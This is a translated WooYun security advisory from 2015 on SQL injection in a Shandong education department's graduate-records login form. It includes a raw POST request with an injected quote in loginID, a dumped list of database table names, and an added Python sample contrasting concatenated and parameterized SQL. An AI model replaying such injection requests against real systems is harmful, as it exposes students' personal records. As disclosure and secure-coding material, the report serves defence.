
Vulnerability summary

Defect ID: wooyun-2015-0139883

Title: SQL injection in the Shandong Provincial Department of Education university graduate system (involves 20 databases / graduate information for universities across the whole province / huge data volume)

Affected vendor: Shandong Provincial Department of Education

Author: 路人甲

Submitted: 2015-09-11 12:29

Fixed: 2015-10-29 08:40

Published: 2015-10-29 08:40

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Handed over to a third-party partner organization (CNCERT, National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2015-09-11: Details sent to the vendor; awaiting vendor handling
2015-09-14: CNCERT (National Internet Emergency Center) has not yet been able to contact the relevant unit; details disclosed only to the reporting organization
2015-09-24: Details disclosed to core white hats and experts in the relevant field
2015-10-04: Details disclosed to regular white hats
2015-10-14: Details disclosed to intern white hats
2015-10-29: Details disclosed to the public

Brief description:

Detailed description:

**.**.**.**:8088/ The injection point is the university login form: POST parameters are not filtered before being used in the SQL query.
20 databases are involved, holding graduate information for universities across the whole province. The data volume is very large; the current database alone has 654 tables.
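The report states that the login handler (checkLogin.jsp) passes the unfiltered loginID parameter into its SQL statement. The following added example is not the site's code and not part of the original report: it reconstructs the two patterns side by side in Python with an in-memory SQLite stand-in (the real database behind the form is unknown; the schema, user row and function names below are assumptions), parses the report's own POST body, and shows why the single quote in loginID=aaaa%27 breaks a concatenated query while a parameterized query treats it as plain data.

```python
import sqlite3
from urllib.parse import parse_qs

# POST body copied from the report's request; %27 decodes to a single quote.
REPORT_BODY = "loginID=aaaa%27&usersPwd=aaa&affixCode=9283&usertype=3&x=57&y=10"


def parse_form(body: str) -> dict:
    """Decode an application/x-www-form-urlencoded body into a flat dict."""
    return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}


def build_db() -> sqlite3.Connection:
    """Constructed stand-in for the login table; the real schema is not known (assumption)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (login_id TEXT, password TEXT, usertype INTEGER)")
    conn.execute("INSERT INTO users VALUES ('student01', 'secret', 3)")
    conn.commit()
    return conn


def check_login_unsafe(conn, login_id: str, pwd: str, usertype: str) -> bool:
    """Vulnerable pattern (hypothetical reconstruction): request values spliced into SQL text.
    Any quote in login_id changes the statement's structure instead of staying data."""
    sql = ("SELECT COUNT(*) FROM users WHERE login_id='" + login_id
           + "' AND password='" + pwd + "' AND usertype=" + usertype)
    return conn.execute(sql).fetchone()[0] > 0


def check_login_safe(conn, login_id: str, pwd: str, usertype: str) -> bool:
    """Hardened pattern: bound parameters, plus type validation of the numeric field."""
    if not usertype.isdigit():
        return False  # reject rather than interpolate a non-numeric usertype
    sql = "SELECT COUNT(*) FROM users WHERE login_id=? AND password=? AND usertype=?"
    return conn.execute(sql, (login_id, pwd, int(usertype))).fetchone()[0] > 0


def probe(check, conn, login_id: str, pwd: str, usertype: str):
    """Run one login check and report ('ok', result) or ('error', message),
    so the difference between the two patterns is observable rather than a crash."""
    try:
        return ("ok", check(conn, login_id, pwd, usertype))
    except sqlite3.Error as exc:
        return ("error", str(exc))


if __name__ == "__main__":
    db = build_db()
    form = parse_form(REPORT_BODY)
    print("decoded loginID:", repr(form["loginID"]))
    for name, fn in (("unsafe", check_login_unsafe), ("safe", check_login_safe)):
        print(name, probe(fn, db, form["loginID"], form["usersPwd"], form["usertype"]))
```

With the report's body, the concatenated query raises a database syntax error (the server-side symptom a defender should look for in application and database error logs), while the parameterized query simply returns "no such user". Both variants still accept the legitimate credentials, so the fix costs nothing functionally; storing the password as a salted hash rather than comparing it in SQL is the next step, but is outside what the report covers.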

Proof of vulnerability:

POST /checkLogin.jsp HTTP/1.1
Host: **.**.**.**:8088
Content-Length: 64
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://**.**.**.**:8088
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
Content-Type: application/x-www-form-urlencoded
Referer: http://**.**.**.**:8088/login.jsp
Accept-Encoding: gzip,deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: JSESSIONID=601EF45D0C88618E29D49D1C9B542F7D
loginID=aaaa%27&usersPwd=aaa&affixCode=9283&usertype=3&x=57&y=10

POST request packet (screenshots: 111.png, 222.png)

Database: EDU
[654 tables]
+------------------------------+
| AREA_BD_2013 |
| DICT_AREA2012 |
| DICT_BZ_SPECIALITY1205 |
| DICT_DEGREE |
| DICT_FORELANGUAGE |
| DICT_GRADUTETYPE |
| DICT_JOBTYPE |
| DICT_NATION |
| DICT_POLITY |
| DICT_SCHOOL |
| DICT_SCHOOL_2010 |
| DICT_SCHOOL_NORMAL |
| DICT_SEX |
| DICT_SPECIALTY_2006 |
| DICT_Y_CULTMODE |
| DICT_Y_SPEC2012 |
| DICT_Y_SPECIAITY1205 |
| DWXZDM |
| EXAMRESULT |
| JYFA2008_BAK2 |
| LSBMDM |
| LUDONG1 |
| OLD_TEM_RESUME |
| QYDM |
| SCHOOL_JYFA_LX |
| SZYF_2009 |
| SZYF_FLAG |
| TBL_BDZSCHEME_11067_2 |
| TBL_BDZSCHEME_11067_DJY |
| TBL_BDZSCHEME_12440 |
| TBL_BDZSCHEME_13777 |
| TBL_BDZSCHEME_13998 |
| TBL_DANGAN1 |
| TBL_DBZCONFIG |
| TBL_DEPART |
| TBL_DICT_DWLSBM |
| TBL_DICT_PROVINCE |
| TBL_EDUCATIONINFO |
| TBL_EDUCATIONINFO_TREATY |
| TBL_EDUMANAGER |
| TBL_ENLISTEE |
| TBL_ENLISTEE1 |
| TBL_ERRGRAD |
| TBL_FOREIGNLANGUAGE |
| TBL_GRABASE |
| TBL_GRABASE_2006 |
| TBL_GRABASE_2007 |
| TBL_GRABASE_TREATY |
| TBL_GRADBASEERR |
| TBL_GRADBASELOGIN |
| TBL_GRADBASELOGINOUT |
| TBL_GRADBASELOGIN_2006 |
| TBL_GRADBASELOGIN_2007 |
| TBL_GRADBASELOGIN_21 |
| TBL_GRADBASELOGIN_ISINFO0 |
| TBL_GRADBASELOGIN_LOG |
| TBL_GRADEDU |
| TBL_GRADEDUPX |
| TBL_GRADEDU_PURVIEW |
| TBL_GRADIRECTION |
| TBL_GRADREG |
| TBL_GRADSTATUS |
| TBL_GRADSTATUS2007 |
| TBL_GRADSTATUS2008 |
| TBL_GRADSTATUS_090522 |
| TBL_GRADSTATUS_1_110 |
| TBL_GRADSTATUS_2007_2008 |
| TBL_GRADSTATUS_ALL |
| TBL_GRADSTATUS_BAK_0901 |
| TBL_GRADSTATUS_ERR |
| TBL_GROUP |
| TBL_GUESTBOOK |
| TBL_GUESTBOOK_COMPANY |
| TBL_HDCWXXB |
| TBL_HIGHSCHOOL |
| TBL_HIGHSCHOOL_20090619 |
| TBL_IMG |
| TBL_JIEYUE |
| TBL_JOB |
| TBL_JOB_20090619 |
| TBL_JYFA |
| TBL_JYPROJECTK |
| TBL_LATECHG_STUINFO |
| TBL_LATECHG_TIME |
| TBL_LEAVEMESSAGE |
| TBL_LETTER |
| TBL_LINSHI_ZHANG |
| TBL_LINYISF |
| TBL_LOG |
| TBL_LOG_SN |
| TBL_LOG_SN1 |
| TBL_LSB |
| TBL_LSB20091031 |
| TBL_LSB20100401 |
| TBL_LSBBF |
| TBL_MAKERESUME |
| TBL_MESSAGE |
| TBL_MESSAGE_OLD |
| TBL_MF_COMCOLLECTION |
| TBL_MF_GRABASE |
| TBL_MF_GRADSTATUS |
| TBL_MF_MIANSHI |
| TBL_MF_SENDRESUME |
| TBL_MF_SIGN |
| TBL_MF_STUDENT |
| TBL_MF_SYS_STUREG |
| TBL_MF_TREATY |
| TBL_MF_ZHIWEI |
| TBL_MIANSHI |
| TBL_MYSEARCH |
| TBL_NEW_BDZSCHE |
| TBL_NOSOURCEID |
| TBL_OUTTREATY_20090619 |
| TBL_OUTTREATY_20120603 |
| TBL_OUT_STUDENT |
| TBL_PROVINCE |
| TBL_PURVIEW |
| TBL_PURVIEW1 |
| TBL_PURVIEW_NEW |
| TBL_QUESTIONANS |
| TBL_STUDENT2013 |
| TBL_ZBSJ_2011_ZSB2 |
| TBL_ZBSJ_2012 |
| TD_COLUMN |
| TD_COURSE |
| TD_GRADBASICINFO |
| TD_GRADBASICINFO2010 |
| TD_GRADBASICINFO_20091108 |
| TD_GRADBASICINFO_20091108BAK |
| TD_GRADBASICINFO_2010 |
| TD_GRADBASICINFO_MUL |
| TD_GRADBASICINFO_UPLOAD |
| TD_GRADEBASICINF_UPLOAD1 |
| TD_GRADRESULT |
| TD_RESUME |
| TEMP1 |
| TEMP20091103 |
| TEMP20091204 |
| TEMPZYDM |
| TEMPZYDM1 |
| TEMPZYDM2 |
| TEMPZYDM3 |
| TEMP_06ZSB |
| TEMP_07ZSB |
| TEMP_20100413 |
| TEMP_BS07 |
| TEMP_BZMOD |
| TEMP_SS07 |
| TEMP_STUDENT_SOURCE_20100527 |
| TEM_RESULT |
| TEM_RESUME |
| TEST |
| T_08ZK |
| T_LQK2013 |
| ZY_BD_2013 |
| DICT_AREA2012 |

Only part of the table list is shown, for reasons of length. All the universities' information is in there and the data volume is huge; this only demonstrates that the impact exists.

Fix recommendation:

Copyright notice: when reposting, please credit the source 路人甲@乌云


Vulnerability response

Vendor response:

Severity: Medium

Vulnerability Rank: 10

Confirmed: 2015-09-14 08:39

Vendor reply:

CNVD has confirmed and reproduced the described situation; it has been forwarded by CNCERT to the Shandong branch center, which will coordinate follow-up handling with the unit that administers the website.

Latest status:

None yet